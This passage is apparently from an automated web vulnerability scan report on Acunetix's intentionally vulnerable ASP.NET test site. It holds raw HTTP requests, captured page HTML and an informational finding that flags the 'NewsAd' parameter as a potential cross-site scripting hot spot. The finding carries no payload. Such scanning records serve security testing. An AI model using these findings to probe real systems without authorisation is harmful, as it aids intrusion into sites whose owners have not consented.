name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgKXjqjGAwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEbWZKkh8Zp+FA94XTXUeb/tBRU3" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="qDfEfqbw" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">You need to enter a username and a password!</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	95
Solution
Reference	https://owasp.org/wstg
Tags
CWE Id
WASC Id
Plugin Id	10104

Informational	User Controllable HTML Element Attribute (Potential XSS)
Description	This check looks at user-supplied input in query string parameters and POST data to identify where certain HTML attribute values might be controlled. This provides hot-spot detection for XSS (cross-site scripting) that will require further review by a security analyst to determine exploitability.

URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the 